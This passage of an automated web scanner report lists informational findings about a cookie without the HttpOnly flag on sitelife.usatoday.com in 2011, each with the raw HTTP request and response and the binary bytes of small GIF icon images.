...[SNIP]...

14.98. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/throbber.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/throbber.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; SiteLifeHost=gnvm3l3pluckcom; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 3951
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "68e18fb51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:20 GMT
Connection: close

GIF89a.....................N.........!..NETSCAPE2.0.....!..Created with ajaxload.info.!..    
...,................=.....|...7........YI....k.......@.N.#..6Z.vd.tE'.y.V.J.49...W.5.]...oY.^..j..,g..>......
...[SNIP]...

14.99. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber_circle.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/throbber_circle.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/throbber_circle.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 1849
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "68e18fb51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:23 GMT
Connection: close

GIF89a......................FFFzzz...XXX$$$...............666hhh.............................................!..NETSCAPE2.0.....!..Created with ajaxload.info.!..    
...,..........w ..    !...DB..A..H.....
...[SNIP]...

14.100. http://sitelife.usatoday.com/ver1.0/Content/ua/images/users/pluck-recommend-user-icon.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/users/pluck-recommend-user-icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/users/pluck-recommend-user-icon.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 339
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "c34392b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:22 GMT
Connection: close

GIF89a........................................................................].............. ..).......................................................................................................
...[SNIP]...

14.101. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/email/pluck-email-icon.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/email/pluck-email-icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/email/pluck-email-icon.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 253
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "c34392b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

GIF89a.............................................................|||zzzxxxuuuqqqooollliiieee```]]].........!.......,..........z`..dY.A.......40.@P.......l#.H$..p.9.&.Ub.K.(..A!.(..J%0(G..."R..,.@..D
...[SNIP]...

14.102. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/permalink/pluck-permalink-icon.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/permalink/pluck-permalink-icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/permalink/pluck-permalink-icon.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 211
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "c34392b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

GIF89a.............cb]`_Z~}x..~.....................III>>>000,,,###..........................................!.......,..........P.%.di.h...X4pS.o<.Np..C.:...x<....X.(".Hp.....    C".P..    w+.,..EEP>....en.
...[SNIP]...

14.103. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-buzz.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-buzz.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-buzz.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 391
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "c34392b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:25 GMT
Connection: close

GIF89a.................Ziq9Q.......l......j...........
..N.....,..f..u..Q.....p....a*U8'........y..........mm...........................................................................................
...[SNIP]...

14.104. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-delicious.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-delicious.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-delicious.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 106
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "1ea694b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

GIF89a...............................!.......,........../H...P..b..>.....9.....................=...$.q...;

14.105. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-digg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-digg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-digg.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 137
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "1ea694b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

GIF89a...............................!.......,..........Nx...%F...uQ.....}Ft.BY.Czxm.n-AY.1..a.....S.@.......#X..Q....r.    f.4J...........;

14.106. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-fb.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-fb.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-fb.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 345
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "1ea694b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

GIF89a.............)>k=Z.`x.bz.d{.k..Te.h}.Td.t........;Y.)>j<Z.Mi.Tn.F[.FZ.d|.Tf.k..l..Tf.l..j.i~.w...................................................................................................
...[SNIP]...

14.107. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-ff.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-ff.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-ff.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 173
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "1ea694b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

GIF89a.............C~....S..d..U........q..t.................!.......,..........Zp.Ik.(......".PT.bX.@.D.N.|. X.G>P........CL..)`..2.3-[..k....RYu7......L;.N...=8..-..._D..;

14.108. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-linkedin.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-linkedin.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-linkedin.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 172
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "1ea694b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

GIF89a......................D......T..].`....................!.......,..........Y..D..2..;.^.i.!....F..G."&...!.H!...n.8(..U. L...F!.(.....i.q......~.FBl.K...x,(w!..\=....;

14.109. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-myspace.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-myspace.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-myspace.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 118
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "1ea694b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

GIF89a.............Cx.g...E..........!.......,..........;x......J9q.)...(    .!|]).J!...?4.g.7\G....o......$I...8N-*....;

14.110. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-reddit.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-reddit.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-reddit.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 271
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "1ea694b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

GIF89a.............xxz...............iji04.^cSMML........K.m,........w.!.........................fff.........!.......,...........`'...e."Td.    .p    YK".hq.-..Q.S. .4....m...&..X..E.$x. .....\8.. q    <&..c..
...[SNIP]...

14.111. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-slashdot.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-slashdot.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-slashdot.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 85
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "1ea694b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

GIF89a...................!.......,..........&....'... .Y-./..u.%...N.T..S.1h........;

14.112. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-stumble.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-stumble.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-stumble.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
